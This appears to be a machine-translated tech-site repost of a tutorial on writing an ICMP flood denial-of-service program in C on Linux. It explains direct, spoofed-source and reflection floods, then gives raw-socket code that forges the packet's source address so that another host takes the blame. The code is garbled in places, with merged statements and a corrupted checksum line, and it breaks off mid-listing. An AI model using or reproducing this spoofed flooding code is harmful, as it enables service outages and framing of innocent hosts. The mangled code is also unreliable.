Shulou(Shulou.com)06/01 Report--

This article will explain in detail the example analysis of ICMP flood attacks in Linux programming. The editor thinks it is very practical, so I share it with you as a reference. I hope you can get something after reading this article.

ICMP flood attack is one of the famous DOS (Denial of Service) attacks, one of the attack methods that hackers like. Here, in order to deepen their understanding of ICMP, we also try to write an ICMP flood attack Mini Program based on ICMP.

Flood attack (FLOOD ATTACK) refers to the network behavior that uses computer network technology to send a large number of useless data packets to the destination host, which makes the destination host busy with useless data packets and unable to provide normal services.

ICMP flood attack: as the name implies, a flood of ping packets is sent to the destination host, making the destination host busy with ping packets and unable to handle other normal requests, which is like flooding the destination host with ping packets.

To realize the flood attack of ICMP, you need the following three knowledge repositories:

Principle of DOS attack

In-depth understanding of ICMP

Programming skills of primitive sockets

First, the principle of ICMP flood attack

ICMP flood attacks are formed on the basis of ping, but ping programs rarely cause the problem of purpose and downtime. This is because the rate of sending packets in ping is too slow. For example, in my PING program, the sending rate of ping packets is limited to 1 send per second, which is more than sufficient for the destination host to process ping packets. Therefore, in order to cause the phenomenon of "flood", it is necessary to increase the rate of sending packets. Here are three ways to attack ICMP floods:

(1) Direct flood attack

This requires a comparison between the bandwidth of the local host and the bandwidth of the destination host, for example, my host network bandwidth is 30m, while your host network bandwidth is only 3m, then I flood your host with a high success rate. This kind of attack requires that the processing power and bandwidth of the attacking host should be greater than that of the attacked host, otherwise it will be DoS. Based on this idea, we can use a high-bandwidth and high-performance computer to send multiple ICMP request messages at a time by multithreading, which makes the destination host busy processing a large number of these messages, resulting in slow speed or even downtime. A big disadvantage of this method is that the other party can block the attack source according to the IP address of the ICMP packet, so that the attack can not continue.

(2) pseudo-IP attack

On the basis of the direct flood attack, we disguise the sender's IP address as another IP. If it is disguised as a random IP, we can hide our location very well. If you disguise your IP as the IP of other victims, it will create a situation of "sowing discord", and the icmp reply packet of victim host 1 will also be flooded to victim host 2. If the administrator of host 1 wants to find out which jerk sent packets to attack him, he will check the source address of the ICMP packet, which turns out to be host 2, so host 2 will become a scapegoat.

(3) reflection attack

The idea of this kind of attack is different from the above two attacks, and the design of reflection attack is more ingenious. In fact, the attack mode of mode 3 here is the combined version and upgraded version of the first two modes, and the attack strategy of mode 3 is a bit like "borrow a knife." the reflection attack is no longer directed at the target host, but makes other hosts mistakenly think that the target host is sending ICMP request packets to them, and then a group of hosts sends ICMP response packets to the destination host, resulting in flooding of the destination host from all directions. For example, we send ICMP request packets to other hosts in the local area network, and then our IP address is disguised as the IP of the destination host, so that the subdestination host becomes the focus of ICMP echo. This attack is very covert because it is difficult for the victim host to find out who the source of the attack is.

2. ICMP flood attack program design.

Here I want to implement an example of an ICMP flood attack, and here I want to use method two to design. Although the "borrowing knife" of mode 3 is more ingenious, it is also further extended by the camouflage of mode 2, and its realization is more or less the same.

First, the model diagram of the attack is given:

1. Group ICMP package

The package here is not much different from the package when writing the PING program, the only thing to note is that we need to fill in the IP header, because we have to disguise the source address to blame others.

Void DoS_icmp_pack (char* packet) {struct ip* ip_hdr = (struct ip*) packet; struct icmp* icmp_hdr = (struct icmp*) (packet + sizeof (struct ip)); ip_hdr- > ip_v = 4; ip_hdr- > ip_hl = 5; ip_hdr- > ip_tos = 0; ip_hdr- > ip_len = htons (ICMP_PACKET_SIZE); ip_hdr- > ip_id = htons (getpid ()); ip_hdr- > ip_off = 0 Ip_hdr- > ip_ttl = 64; ip_hdr- > ip_p = PROTO_ICMP; ip_hdr- > ip_sum = 0; ip_hdr- > ip_src.s_addr = inet_addr (FAKE_IP); / / camouflage the source address ip_hdr- > ip_dst.s_addr = dest; / / enter the destination host address icmp_hdr- > icmp_type = ICMP_ECHO; icmp_hdr- > icmp_code = 0 Icmp_hdr- > icmp_cksum = htons (~ (ICMP_ECHO pprotoplast; dest = inet_addr (argv [1]); if (dest = = INADDR_NONE) {host = gethostbyname (argv [1]); if (host = = NULL) {printf ("Invalid IP or Domain name!\ n"); return-1;} memcpy ((char*) & dest, host- > h_addr, host- > h_length) } rawsock = socket (AF_INET, SOCK_RAW, PROTO_ICMP); if (rawsock < 0) {printf ("Fait to create socket!\ n"); return-1;} setsockopt (rawsock, SOL_IP, IP_HDRINCL, "1", sizeof ("1")); printf ("ICMP FLOOD ATTACK START\ n"); for

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.